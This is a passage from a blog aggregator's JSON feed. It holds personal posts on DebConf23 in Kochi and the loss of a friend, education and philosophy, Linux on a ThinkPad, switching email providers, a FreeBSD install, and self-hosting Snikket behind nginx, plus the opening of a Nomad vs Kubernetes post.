the party, serving them the snacks given to me by Abhas. The news of an alcohol party at my room spread like wildfire. Soon there were so many people that the AC became ineffective and I found myself sweating.\nI left the room and roamed around in the hotel for some fresh air. I came back after about 1.5 hours - for most part, I was sitting at the ground floor with TK Saurabh. And then I met Abraham near the gym (which was my last meeting with him). I came back to my room at around 2:30 AM. Nobody seemed to have realized that I was gone. They were thanking me for hosting such a good party. A lot of people left at that point and the remaining people were playing songs and dancing (everyone was dancing all along!). I had no energy left to dance and to join them. They left around 03:00 AM. But I am glad that people enjoyed partying in my room.\nThis picture was taken when there were few people in my room for the party.\n\nSadhya Thali\nOn the 12th of September, we had a sadhya thali for lunch. It is a vegetarian thali served on a banana leaf on the eve of Thiruvonam. It wasn’t Thiruvonam on this day, but we got a special and filling lunch. The rasam and payasam were especially yummy.\nSadhya Thali: A vegetarian meal served on banana leaf. Payasam and rasam were especially yummy! Photo credits: Ravi Dwivedi.\n\n\n\nSadhya thali being served at debconf23. Photo credits: Bilal\n\nDay trip\nOn the 13th of September, we had a daytrip. I chose the daytrip houseboat in Allepey. Suresh chose the same, and we registered for it as soon as it was open. This was the most sought-after daytrip by the DebConf attendees - around 80 people registered for it.\nOur bus was set to leave at 9 AM on the 13th of September. Me and Suresh woke up at 8:40 and hurried to get to the bus in time. It took two hours to reach the venue where we get the houseboat.\nThe houseboat experience was good. The trip featured some good scenery. I got to experience the renowned Kerala backwaters. We were served food on the boat. We also stopped at a place and had coconut water. By evening, we came back to the place where we had boarded the boat.\nGroup photo of our daytrip. Photo credits: Radhika Jhalani\n\nA good friend lost\nWhen we came back from the daytrip, we received news that Abhraham Raji was involved in a fatal accident during a kayaking trip.\nAbraham Raji was a very good friend of mine. In my Albania-Kosovo-Dubai trip last year, he was my roommate at our Tirana apartment. I roamed around in Dubai with him, and we had many discussions during DebConf22 Kosovo. He was the one who took the photo of me on my homepage. I also met him in MiniDebConf22 Palakkad and MiniDebConf23 Tamil Nadu, and went to his flat in Kochi this year in June.\nWe had many projects in common. He was a Free Software activist and was the designer of the DebConf23 logo, in addition to those for other Debian events in India.\nA selfie in memory of Abraham.\n\nWe were all fairly shocked by the news. I was devastated. Food lost its taste, and it became difficult to sleep. That night, Anisa and Kristi cheered me up and gave me company. Thanks a lot to them.\nThe next day, Joenio also tried to console me. I thank him for doing a great job. I thank everyone who helped me in coping with the difficult situation.\nOn the next day (the 14th of September), the Debian project leader Jonathan Carter addressed and announced the news officially. THe Debian project also mentioned it on their website.\nAbraham was supposed to give a talk, but following the incident, all talks were cancelled for the day. The conference dinner was also cancelled.\nAs I write, 9 days have passed since his death, but even now I cannot come to terms with it.\nVisiting Abraham’s house\nOn the 15th of September, the conference ran two buses from the hotel to Abraham’s house in Kottayam (2 hours ride). I hopped in the first bus and my mood was not very good. Evangelos (Germany) was sitting opposite me, and he began conversing with me. The distraction helped and I was back to normal for a while. Thanks to Evangelos as he supported me a lot on that trip. He was also very impressed by my use of the StreetComplete app which I was using to edit OpenStreetMap.\nIn two hours, we reached Abraham’s house. I couldn’t control myself and burst into tears. I went to see the body. I met his family (mother, father and sister), but I had nothing to say and I felt helpless. Owing to the loss of sleep and appetite over the past few days, I had no energy, and didn’t think it was good idea for me to stay there. I went back by taking the bus after one hour and had lunch at the hotel. I withdrew my talk scheduled for the 16th of September.\nA Japanese gift\nI got a nice Japanese gift from Niibe Yutaka (Japan) - a folder to keep papers which had ancient Japanese manga characters. He said he felt guilty as he swapped his talk with me and so it got rescheduled from 12th September to 16 September which I withdrew later.\nThanks to Niibe Yutaka (the person towards your right hand) from Japan (FSIJ), who gave me a wonderful Japanese gift during debconf23: A folder to keep pages with ancient Japanese manga characters printed on it. I realized I immediately needed that :)\n\n\n\nThis is the Japanese gift I received.\n\nGroup photo\nOn the 16th of September, we had a group photo. I am glad that this year I was more clear in this picture than in DebConf22.\nVolunteer work and talks attended\nI attended the training session for the video team and worked as a camera operator. The Bits from DPL was nice. I enjoyed Abhas’ presentation on home automation. He basically demonstrated how he liberated Internet-enabled home devices. I also liked Kristi’s presentation on ways to engage with the GNOME community.\nBits from the DPL. Photo credits: Bilal\n\n\n\nKristi on GNOME community. Photo credits: Ravi Dwivedi.\n\n\n\nAbhas' talk on home automation. Photo credits: Ravi Dwivedi.\n\nI also attended lightning talks on the last day. Badri, Wouter, and I gave a demo on how to register on the Prav app. Prav got a fair share of advertising during the last few days.\nI was roaming around with a QR code on my T-shirt for downloading Prav.\n\nDeparture day\nThe 18th of September was the day of departure. Badri slept in my room and left early morning (06:30 AM). I dropped him off at the hotel gate. The breakfast was at the eatery (3rd floor) again.\nI had an 8 PM flight from Kochi to Delhi, for which I took a cab with Rhonda (Austria), Michael (Nigeria) and Yash (India). We were joined by other DebConf23 attendees at the Kochi airport, where we took another selfie.\nRuchika (taking the selfie) and from left to right: Yash, Joost (Netherlands), me, Rhonda\n\nJoost and I were on the same flight, and we sat next to each other. He then took a connecting flight from Delhi to Netherlands, while I went with Yash to the New Delhi Railway Station, where we took our respective trains. I reached home on the morning of the 19th of September, 2023.\nJoost and me going to Delhi. Photo credits: Ravi.\n\nBig thanks to the organizers\nDebConf23 was hard to organize - strict alcohol laws, weird hotel rules, death of a close friend (almost a family member), and a scary notice by the immigration bureau. The people from the team are my close friends and I am proud of them for organizing such a good event.\nNone of this would have been possible without the organizers who put more than a year-long voluntary effort to produce this. In the meanwhile, many of them had organized local events in the time leading up to DebConf. Kudos to them.\nThe organizers also tried their best to get clearance for countries not approved by the ministry. I am also sad that people from China, Kosovo, and Iran could not join. In particular, I feel bad for people from Kosovo who wanted to attend but could not (as India does not consider their passport to be a valid travel document), considering how we Indians were so well-received in their country last year.\nNote about myself\nI am writing this on the 22nd of September, 2023. It took me three days to put up this post - this was one of the tragic and hard posts for me to write. I have literally forced myself to write this. I have still not recovered from the loss of my friend. Thanks a lot to all those who helped me.\nPS: Credits to contrapunctus for making grammar, phrasing, and capitalization changes.",[],{"slug":1131,"title":1132,"link":1133,"pubDate":1134,"contentSnippet":1135,"tags":1136,"maintainerName":410,"maintainerUsername":411,"maintainerPhoto":412,"feedUrl":413},"cosmos","Shores of the cosmic ocean","https:\u002F\u002Fworkdone0.substack.com\u002Fp\u002Fcosmos","Fri, 15 Sep 2023 00:00:00 GMT","In this piece, I reflect on our place in the vast universe — Earth as a tiny “shore” in the ocean of the cosmos, and how human curiosity drives us to explore what lies beyond our horizon.",[],{"slug":1138,"title":1139,"link":1140,"pubDate":1141,"contentSnippet":1142,"tags":1143,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-15","Emerging from dotemacs bankruptcy the hard way: integrating the IDE (feat. Clojure(Script))","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Femerging-from-dotemacs-bankruptcy-ide-experience\u002Findex.html","Thu, 07 Sep 2023 00:00:00 +0000","The one in which we design a rich Integrated Development Environment (IDE) experience, using Clojure as our muse. Featuring Language Server Protocol (lsp-mode + clojure-lsp), clojure-mode, cider, and more! Buckle up and get a coffee.",[227,1144,457,1108,52],"emacs",{"slug":1146,"title":1147,"link":1148,"pubDate":1149,"contentSnippet":1150,"tags":1151,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"education-system-and-youth","The Cobwebs of Indian Education System","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Feducation-system-and-youth\u002F","Wed, 30 Aug 2023 14:20:07 +0000","I write this as when India has successfully landed and is carrying out it’s Chandrayan-3 mission. This is a very proud moment for each and every Indian. India has become the first country to land on Moon’s South Pole, I’d like to congratulate all the people who were involved in this mission! Anyway, I stumbled upon this old essay from 1999, titled “INDIAN TALENT CAUGHT IN THE COBWEBS”, It mentions how Indian society in general resists change.",[],{"slug":1153,"title":1154,"link":1155,"pubDate":1156,"contentSnippet":1157,"tags":1158,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"04-philosophy-should-be-part-of-edu-system-html","Why philosophy should be part of the educationsystem","https:\u002F\u002Faryak.me\u002Fblog\u002F04-philosophy-should-be-part-of-edu-system.html","Sat, 19 Aug 2023 12:39:45 +0000","I was recently reading the essay, On Liberty, by John Stuart Mill and\nI was very intrigued by some of the points brought up by the book.\nThis led me to think again about something I have been pondering\nabout in and out for ages, the place of philosophy in the educational\nsystem.\nThe problem\nI’ll start with the problem. To be honest, this generation is\nextremely apolitical, and non-politically active.\nAll they care about is getting good marks, passing 10th\u002F12th and\ngetting a good college\u002Fjob, while ignoring the big and important\nquestion, the state of our nation.\nWhen noone cares about the nation, asatyamev hi jayate (injustice\nalone will prevail), for there is no person to keep check on the\ngovernment.\nEvery person’s goal in life is to serve themselves. Me first,\neverything secondary. This is how humans work.\nThe government is meant to mediate this but its not a bulletproof\nentity, its made of people, whose primary goal is to serve\nthemselves.\nThis is why we need someone to keep the government in check, and\nunintellectual and aloofness from politics does not help.\nThis I feel, is excacerbated by the education system, especially\nhere, which encourages rote learning.\nThe state of the\ncurrent education system\nThis is especially bad with social studies, where it is important to\nbe opinion based, not “I just memorized this chapter and can get 100 in\ntommorow’s exam”.\nI guess this could apply to the sciences, mathematics etc. but it is\neven more important in the social sciences and humanities.\nSocial Studies must be opinions, what you think about this thing, who\nis in the right and who is in the wrong according to you, with multiple\nsources to understand from.\nPeople should be marked based on the intellectual-ness of the answer,\nnot based on how “politically-correct” or similar to textbook the answer\nis.\nHere is where philosophy plays an important role.\nWhile social studies only covers laws, history and generally how our\ncurrent system came to be, philosophy questions the basic theory.\nPhilosophy awakens the intellectual-ness, and makes people think\ncritically.\nIt encourages and makes people go into deep thoughts and intellectual\ndiscussions, which benifit them mentally and society in large as we get\nmore intelligent people.\nThis encouragement that used to be prevailent in the ancient times of\nGurukuls has been effectively wiped off by the advent of the structured\neducational system.\nMy\nideas for how philosophy could be implemented in education\nPhilosophy is a vast and varied subject.\nI would say, extracts from philosophical texts from the big 4\ntraditions (western, indian, chinese, islamic) should be given to\nstudents about a specific topic, which of course must be suitable for\ntheir grade and they should be asked to comment on what they think about\neach.\nIn my opinion, everything should be marked based on the intellect of\nthe answer, and when marks are deducted for “wrong-think”, students\nshould be able to appeal to a board setup to answer and co-ordinate with\nschools about these kind of marking conflicts.\nThe “untouchable” subjects\nThere are many subjects that are untouchable in any normal debate, be\nit caste, morality, religion etc.\nThis is BAD and leads to forcing of opinions and generally lack of\nintellectualism around these topics.\nYou cannot and should not take a blind follow approach to anything.\nQuestion every single thing you have to do, be it rhetorical or directed\ntowards someone else.\nThe law\nThe law should be more liberal when it comes to “wrong-think”. Speech\nshould be allowed as long as it does not incite or promote violence.\nI know incite violence is vague as hell, and that is of course\nbecause of how varied stuff can cause people to get mad.\nA small social media post about something inciteful can cause more\nharm than someone saying extremely inciting\u002Fdangerous things to even a\nbig audience.\n“Hate speech” can not be regulated, and the intentions of something\ncannot be easily made out.\nTo be frank, I don’t have any ideas about this. Maybe a committee to\ndecide what constitutes a hate-speech and what does not, but then there\nare of course biases.\nIf you go with a simple “if there is violence due to your post we\narrest you”, you risk arresting people whose post unintentionally\nincited the same.\nBut, at the end of the day, the law should be more allowing for free\nthinking and intellectual discussions, as long as of course, it doesnt\nincite violent acts.\nSocietal stuff\nPeople also are moulded more and more into non-individualistic\nrobots, who all share the same happiness and same opinions.\nPeople like something just because others like it, and if they don’t\nlike it they are treated like outcasts from society.\nPeople have no individualistic goals in life, just the standard\n“getting good marks, passing 10th\u002F12th and getting a good\ncollege\u002Fjob”\nWhile these are also extremely important, we need to stress on the\nimportance of a life where people aren’t just robots who do what they\nare told to do (or NPCs as the zoomers call it).\nThis could be lessened by philosophy, which imbibes critical thinking\nin the mind of those who read it.\nI should have published this on Independence day since well a lot of\nthese were ponderings about the Indian independence and what it gave us\nIndians, but well procrastination :)\nI know this is a bit rambly but I hope you get the point :P",[1159],"2023\u002F08\u002F19\u002F6",{"slug":1161,"title":1162,"link":1163,"pubDate":1164,"contentSnippet":1165,"tags":1166,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"03-e14-linux-html","Linux on the Thinkpad E14 G5 AMD","https:\u002F\u002Faryak.me\u002Fblog\u002F03-e14-linux.html","Wed, 16 Aug 2023 12:39:45 +0000","I recently got a thinkpad E14 gen5 with a ryzen 5 7th gen to replace\nmy Acer Aspire 7.\nOf course I wanted to replace the default windows with linux, but I\nwas too lazy to reinstall and hence just put my old NVMe SSD in the\nlaptop thanks to the availability of 2 M.2 slots.\nBefore this I had to disable secure boot in the bios which I did\nalong with a few other “important” changes (which I’ll cover later)\nPast this, most things worked out of the box after removing my old\nNvidia drivers. Ryzen is really good on linux :P\nHowever, 2 things didn’t work correctly, the Fingerprint sensor and\nWiFi card.\nRealtek WiFi\nAfter the initial setup, my realtek wifi card was having frequent\ndisconnection issues. It will suddenly just stop transmitting data and\nthe fix was to reconnect to the wifi network.\nAnother issue is that the Realtek WiFi card only works with kernels\n6.2+. This wasn’t an issue for me as a Debian Sid user but when I first\ntested the compatibility on an Ubuntu 22.04 ISO before adding my drive,\nthis was pretty weird\u002Fconfusing.\nAfter a bit of searching, I figured out that the random disconnection\nwas due to NetworkManager’s randomized mac addresses.\nTo fix this, I just had to append the following to the\nNetworkManager.conf file:\n[device]\nwifi.scan-rand-mac-address=no\nGoodix Fingerprint\nI thought the fingerprint was useless for good, until I discovered\nthat Lenovo provided drivers for their fingerprint sensor through one of\nthe manuals I was searching through.\nOriginally I didn’t find anything, since the driver page for my model\ndidn’t show linux, but after a bit of searching again, I stumbled across\nthis\nsupport page that gave links to drivers.\nSince I ran debian testing and its mostly compatible with what Ubuntu\nhas, I tried just installing libfprint-2-2 normally and then the\ndriver’s deb, but the deb refused to install since it needed libfprint-2-tod\n(a fork of libfprint with support for TOD\u002Ftouch based fingerprint\nreaders).\nI tried installing the deb from ubuntu repos and then install the\ndriver, which succeeded, but didn’t make the device work.\nLater, I installed ubuntu 22.04 on a secondary partition to check if\nit worked on ubuntu, which it did.\nOne thing I noticed, however was that it used a\nppa instead of regular libfprint(-tod) from canonical repos.\nThen, I tried installing libfprint and libfprint-tod debs from that\nppa and the goodix deb from lenovo, and after a reboot, everything\nworked!\nOnce it was up, I installed fprintd and libpam-fprintd, at which\npoint I did the fprintd-enroll and fprintd-verify.\nAfter these succeeded, I ran\npam-auth-update --enable fprintd. This made fprintd work on\npam stuff like sudo and TTY logins.\nWith this, the last remaining non-working feature of my thinkpad was\nworking as well :D\nThe BIOS\nOnce I got my thinkpad, basically the first thing I did was tweak the\nBIOS.\nGetting into the BIOS is dead simple compared to other laptops, just\npress enter (which it tells you during bootup) and it will take you to a\nmenu, from where you can choose to go to the BIOS with F1.\nI was pleasantly surprised to see a modern BIOS, with touchpad\nsupport. Coming from laptops which only had blue and white bioses and\nbarely any tweaks, this was a welcome upgrade :)\nFirst thing to disable was secure boot. It was present in Security\nsection of the BIOS and was pretty easy to disable\nThen, I permanently disabled some enterprise spyware utility (UPDATE:\nit was called Absolute under Security).\nThere was also Lenovo Cloud Services in Config -> Network, which I\nof course disabled.\nWhile in Security, I disabled Enhanced Windows Biometric Security (in\nVirtualization) and Microsoft Device Guard.\nAnd thats it for now, I’ll update this blogpost if I face any other\nissues or discover other stuff. Thanks for sticking around :)\nIf you have any questions, feel free to contact\nme!",[1167],"2023\u002F08\u002F16\u002F3",{"slug":1169,"title":1170,"link":1171,"pubDate":1172,"contentSnippet":1173,"tags":1174,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"my-steps-transfer-mail-from-gandi","My Steps: Switching e-mail provider from gandi.net","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fmy-steps-transfer-mail-from-gandi\u002F","Tue, 15 Aug 2023 08:52:43 +0530","Earlier this year, gandi.net’s ownership changed and it was acquired by Total Webhosting Solutions. My domain and email were both hosted by this provider. Since I didn’t agree with the ownership change, I decided to switch my email provider. After discussing with Sahil, Snehal, Praveen, Nilesh, I shortlisted two email providers to choose from for ravi at ravidwivedi.in. One was purelymail and the other was mailbox.org. Since purelymail($10 per year) was cheaper than mailbox(€36 per year), I decided to give it a try. If this does not work out, I thought, I will switch to mailbox later.\nBelow are my steps on how I did it. The steps will be same in principle for any other provider you would like to switch to. So the guide will be helpful to you if you want to switch to any other email provider other than purelymail.\nBe sure to read docs of the email provider you want to switch to in addition to this guide.\nStep 1: Create an account on purelymail.com\nFirst, I signed up on purelymail and created an account (like something@purelymail.com). They charged $10 upfront for creating this acount.\nStep 2: Add your domain to your purelymail account\nSign in to your purelymail account and click on Domains section on the top and you will see a page like the screenshot below:\nClick on ‘Add new domain’ as in the above screenshot.\nStep 3: Enter domain name\nEnter your domain name (like example.com) to the page which you got after clicking ‘Add new domain’ in last step.\nStep 4: Create an MX record\nCreate a new MX record in your gandi.net portal or whatever domain registrar you bought your domain from. Use your mail provider docs to obtain these values and plug in.\nType\n    Host\n    Value\n  \nMX\n    (Empty)\n    mailserver.purelymail.com. (this is a sample value, you should put the value recommended by your email provider. dot at the end of the value is important.)\n  \nStep 5: Add an SPF record\nCreate a new SPF record as you did in Step 4. Again, use your mail provider docs to obtain these values and plug in.\nType\n    Host\n    Value\n  \nTXT\n    (Empty)\n    v=spf1 include:_spf.purelymail.com ~all (this is a sample value, you should put the value recommended by your email provider)\n  \nStep 6: Add a TXT record to prove that you own the domain\nI am not sure if this step is necessary for other email providers or even for purelymail, but since it was recommended by their docs I added this value from my gandi.net portal. It is a TXT record like this:\nType\n    Host\n    Value\n  \nTXT\n    (Empty)\n    Redacted\n  \nStep 7: Add DKIM signatures\nDKIM signature is for the email receiver to verify whether the email has indeed been sent by the domain owner. It is highly recommended. You can read more about DKIM signature here. Read your docs of your email provider and put the respective values.\nBelow is a sample taken from my steps:\nType\n    Host\n    Value\n  \nCNAME\n    purelymail1._domainkey\n    key1.dkimroot.purelymail.com. \n  \nNote: the dot at the end is important.\nI added two other CNAME records in this step as suggested by purelymail docs.\nStep 8: Add DMARC record\nCreate a DMARC record (check your provider docs for values) as you created other records in previous steps.\nType\n    Host\n    Value\n  \nCNAME\n    check your docs\n    check your docs\n\nStep 9: Check your DNS records\nNow we verify whether our records point to our new provider. Purelymail portal has a button ‘Check DNS records’ and it can find whether records you entered are correct. It takes a few minutes and sometimes a few hours for the DNS records to propagate.\nPurelymail portal showing all DNS records were entered correctly.\n\nStep 10: Create account on new provider\nAfter all the records have been correctly added, create an account on purelymail by clicking ‘Users’ button at the top and create a new user. I created ravi@ user on my domain from there.\nStep 11: Import data from gandi.net email\npurelymail has an option to import data, like emails, calendar and address book from previous account. Use that option to import emails from gandi.net. Or you can use IMAP to login to your new provider in an email client like Thunderbird and manually copy all the emails to your new account.\nStep 12: Delete gandi.net email and DNS records\nDelete gandi.net email from the gandi.net portal and remove all the previous records which point to gandi.net for email(like MX, SPF, DKIM).\nYou are done. Enjoy your new email provider and let me know which one you switched to and why :-)",[],{"slug":1176,"title":1177,"link":1178,"pubDate":1179,"contentSnippet":1180,"tags":1181,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-16","Emerging from dotemacs bankruptcy the hard way: getting about","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Femerging-from-dotemacs-bankruptcy-getting-about\u002Findex.html","Wed, 02 Aug 2023 00:00:00 +0000","We want to maximize our ability to \"stay in The Zone\". So the aim is to create the fastest, smoothest, tightly integrated, and unobtrusive mechanism to get things done using the keyboard alone.",[227,1144,457,1108],{"slug":1183,"title":1184,"link":1185,"pubDate":1186,"contentSnippet":1187,"tags":1188,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"freebsd-install-issues","FreeBSD Install: Hiccups and Issues","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffreebsd-install-issues\u002F","Mon, 31 Jul 2023 19:44:19 +0530","I installed FreeBSD 13.2 with KDE today on my Dell Inspiron 5482. I have heard good things about FreeBSD primarily as an operating system for servers, but the project claims that it works well for desktop users as well. So, I thought I will give it a try. There were some things I had to figure out during the installation which I will note in this post for future reference. And I had to uninstall FreeBSD within hours of installation, due to issues I faced so it didn’t went well. I am going to list them here and how I figured out some things.\nRegdomain selection during install\nDuring install, the installer asked me to select a regdomain. I figured out that the default option – FCC\u002FUnited States of America worked for me.\nXorg didn’t startup\nPost installation, I installed xorg in FreeBSD and added a file \u002Fusr\u002Flocal\u002Fetc\u002FX11\u002Fxorg.conf.d\u002F20-intel.conf as per the example 1 in the official handbook. But startx command wasn’t working, so I ran the command:\nXorg -configure\nand  then\ncp \u002Froot\u002Fxorg.conf.new \u002Fusr\u002Flocal\u002Fetc\u002FX11\u002Fxorg.conf followed by editing the file \u002Fusr\u002Flocal\u002Fetc\u002FX11\u002Fxorg.conf by changing Driver value to \"i1915kms\" under the Section “Device”.\nManaging brightness during startup\nWhen using FreeBSD, my keyboard’s brightness buttons were not working. To decrease brightness, I used the preinstalled backlight utility.\nbacklight -f \u002Fdev\u002Fbacklight\u002Fbacklight0 10\nCredits to this answer.\nI couldn’t manage the brightness to be automatically low at startup. It was at 100% after very time I booted.\nCrashed frequently\nThe system crashed frequently and wasn’t stabled at all. It automatically reboots after some time. I tried to debug and fix, but couldn’t. So, for now I have uninstalled FreeBSD.\nIf you know any of the fixes, please let me know.",[],{"slug":1190,"title":1191,"link":1192,"pubDate":1193,"contentSnippet":1194,"tags":1195,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"self-host-snikket-behind-nginx","My Steps: Self hosting Snikket behind nginx","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fself-host-snikket-behind-nginx\u002F","Wed, 26 Jul 2023 01:53:54 +0530","Snikket is a server side software for XMPP chat communications. This guide is for anyone who wants to set up a Snikket server behind nginx. The operating system on the server is debian in my case. My guide is based on the official guide.\nRun all the commands mentioned below as root.\nPoint your domain to server’s IP address\nInstall curl for debian\napt install curl\n\nNow run:\ncurl -4 ifconfig.co\n\nThe output of the previous command is the IP Address of the server you are using.\nCreate an A record corresponding to the domain you want to use. Since I have domain ravidwivedi.in, I will deploy my chat server at the subdomain chat.ravidwivedi.in.\nCreate CNAME records for groups.chat.ravidwivedi.in and share.chat.ravidwivedi.in so that they point to chat.ravidwivedi.in\nOpen required ports\nOpen required ports if you are behind a firewall like ufw. The official Snikket docs list which ones you have to allow.\nDocker and snikket configuration\nInstall docker and docker-compose packages on your server. The commands for debian are:\napt install docker docker-compose\n\nSnikket configuration\nCreate a snikket config file and download docker-compose.yml file prepared by the Snikket project.\nmkdir \u002Fetc\u002Fsnikket\ncd \u002Fetc\u002Fsnikket\ncurl -o docker-compose.yml https:\u002F\u002Fsnikket.org\u002Fservice\u002Fresources\u002Fdocker-compose.beta.yml\n\nCreate a file named snikket.conf in the \u002Fetc\u002Fsnikket directory with the following contents (replace appropriate fields according to your domain and email):\n# The primary domain of your Snikket instance\nSNIKKET_DOMAIN=chat.ravidwivedi.in\n\n# An email address where the admin can be contacted\n# (also used to register your Let's Encrypt account to obtain certificates)\nSNIKKET_ADMIN_EMAIL=your-email@ravidwivedi.in\n\nNginx config and HTTPS\nFor nginx setup, we follow Snikket project’s reverse proxy docs. We will also setup HTTPS certificates using certbot. Let’s install nginx and certbot:\napt install nginx python3-certbot-nginx\n\nObtain certificates for all the subdomains\ncertbot certonly --standalone -d share.chat.ravidwivedi.in -d groups.chat.ravidwivedi.in  -d chat.ravidwivedi.in\n\nThe output for me was:\nSuccessfully received certificate.\nCertificate is saved at: \u002Fetc\u002Fletsencrypt\u002Flive\u002Fchat.ravidwivedi.in\u002Ffullchain.pem\nKey is saved at:         \u002Fetc\u002Fletsencrypt\u002Flive\u002Fchat.ravidwivedi.in\u002Fprivkey.pem\nThis certificate expires on 2023-10-23.\nThese files will be updated when the certificate renews.\nCertbot has set up a scheduled task to automatically renew this certificate in the background.\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nIf you like Certbot, please consider supporting our work by:\n * Donating to ISRG \u002F Let's Encrypt:   https:\u002F\u002Fletsencrypt.org\u002Fdonate\n * Donating to EFF:                    https:\u002F\u002Feff.org\u002Fdonate-le\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nWe want nginx to listen at ports 80 and 443. So, let’s direct Snikket to bind to ports 5080 and 5443 to avoid conflict with nginx. To do this, add these lines to \u002Fetc\u002Fsnikket\u002Fsnikket.conf:\nSNIKKET_TWEAK_HTTP_PORT=5080\nSNIKKET_TWEAK_HTTPS_PORT=5443\n\nNow create a file \u002Fetc\u002Fnginx\u002Fsites-available\u002Fchat.ravidwivedi.in and add the following contents to it, followed by replacing ravidwivedi.in with your domain name and specifying correct ssl_certificate path to the location of your certificates.\nserver {\n  # Accept HTTP connections\n  listen 80;\n  listen [::]:80;\n\n  server_name chat.ravidwivedi.in;\n  server_name groups.chat.ravidwivedi.in;\n  server_name share.chat.ravidwivedi.in;\n\n  location \u002F {\n      proxy_pass http:\u002F\u002Flocalhost:5080\u002F;\n      proxy_set_header      Host              $host;\n      proxy_set_header      X-Forwarded-For   $proxy_add_x_forwarded_for;\n\n      # This is the maximum size of uploaded files in Snikket\n      client_max_body_size 104857616; # 100MB + 16 bytes\n  }\n}\n\nserver {\n  # Accept HTTPS connections\n  listen [::]:443 ssl ipv6only=on;\n  listen 443 ssl;\n  ssl_certificate \u002Fpath\u002Fto\u002Fcertificate.pem;\n  ssl_certificate_key \u002Fpath\u002Fto\u002Fkey.pem;\n\n  server_name chat.ravidwivedi.in;\n  server_name groups.chat.ravidwivedi.in;\n  server_name share.chat.ravidwivedi.in;\n\n  location \u002F {\n      proxy_pass https:\u002F\u002Flocalhost:5443\u002F;\n      proxy_set_header      Host              $host;\n      proxy_set_header      X-Forwarded-For   $proxy_add_x_forwarded_for;\n      # REMOVE THIS IF YOU CHANGE `localhost` TO ANYTHING ELSE ABOVE\n      proxy_ssl_verify      off;\n      proxy_set_header      X-Forwarded-Proto https;\n      proxy_ssl_server_name on;\n\n      # This is the maximum size of uploaded files in Snikket\n      client_max_body_size 104857616; # 100MB + 16 bytes\n\n      # For BOSH and WebSockets\n      proxy_set_header Connection $http_connection;\n      proxy_set_header Upgrade $http_upgrade;\n      proxy_read_timeout 900s;\n\n  }\n}\n\nIn the above config, we need to specify path to our certificates created by certbot in an earlier step of this guide. Locate the following lines:\nssl_certificate \u002Fpath\u002Fto\u002Fcertificate.pem;\nssl_certificate_key \u002Fpath\u002Fto\u002Fkey.pem;\n\nThe output of my certbot command earlier told me that the certificates are at \u002Fetc\u002Fletsencrypt\u002Flive\u002Fchat.ravidwivedi.in\u002Ffullchain.pem and ssl_key is at \u002Fetc\u002Fletsencrypt\u002Flive\u002Fchat.ravidwivedi.in\u002Fprivkey.pem\nSo we change the above mentioned two lines in the nginx config at \u002Fetc\u002Fnginx\u002Fsites-available\u002Fchat.ravidwivedi.in to:\nssl_certificate \u002Fetc\u002Fletsencrypt\u002Flive\u002Fchat.ravidwivedi.in\u002Ffullchain.pem;\nssl_certificate_key \u002Fetc\u002Fletsencrypt\u002Flive\u002Fchat.ravidwivedi.in\u002Fprivkey.pem;\n\nAfter making these changes to file, save it. Now, create symlink to \u002Fetc\u002Fnginx\u002Fsites-enabled\u002Fchat.ravidwivedi.in file by running the command:\nln -s \u002Fetc\u002Fnginx\u002Fsites-available\u002Fchat.ravidwivedi.in \u002Fetc\u002Fnginx\u002Fsites-enabled\u002Fchat.ravidwivedi.in\n\nRestart nginx:\nsystemctl restart nginx\n\nYou can also check if nginx syntax is correct by running\nnginx -t\n\nIf the output of this command indicates an error, you need to fix that error before moving on.\nLaunch Snikket\nGo back into \u002Fetc\u002Fsnikket directory by running:\ncd \u002Fetc\u002Fsnikket\n\nNow run:\ndocker-compose up -d\n\nAfter the command run is complete, visit chat.ravidwivedi.in and you will see a login page as in the screenshot below.\nIf you don’t see this login page, there is some error in your setup.\nIf you are able to see that login page, create an account with admin privileges by running the command:\ndocker exec snikket create-invite --admin --group default\n\nPost install\nSnikket project has a page mentioning additional lines you can add to your snikket config file, like for example, setting limit on size of each attachment. Also, check out the upgrade page on how to keep snikket software updated.\nIf you are using Snikket, be sure to donate to the Snikket project to support them.",[],{"slug":1197,"title":1198,"link":1199,"pubDate":1200,"contentSnippet":1201,"tags":1202,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"nomad-k8s-showdown","Nomad can do everything that K8s can","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fnomad-k8s-showdown\u002F","2023-07-23T05:34:47.000Z","This blog post is ignited by the following Twitter exchange:\n\nI don’t take the accusation of unsubstantiated argument, especially on a technical topic lightly. I firmly believe in substantiated arguments and hence, here I am, elaborating on my stance. If found mistaken, I am open to corrections and revise my stance.\nSome Historical Context#\nIn my professional capacity, I have run and managed several K8s clusters (using AWS EKS) for our entire team of devs (been there done that). The most complex piece of our otherwise simple and clean stack was K8s and we’d been longing to find a better replacement. None of us knew whether that would be Nomad or anything else. But we took the chance and we have reached a stage where we can objectively argue that, for our specific workloads, Nomad has proven to be a superior tool compared to K8s.\nBuilding with Nomad#\nNomad presents a fundamental building block approach to designing your own services. It used to be true that Nomad was primarily a scheduler, and for serious production workloads, you had to rely on Consul for service discovery and Vault for secret management. However, this scenario has changed as Nomad now seamlessly integrates these features, making them first-class citizens in its environment. Our team replaced our HashiCorp stack with just Nomad, and we never felt constrained in terms of what we could accomplish with Consul\u002FVault. While these tools still hold relevance for larger clusters managed by numerous teams, they are not necessary for our use case.\nDeconstructing Infrastructure#\nKubernetes employs a declarative state for every operation in the cluster, essentially operating as a reconciliation mechanism to keep everything in check. In contrast, 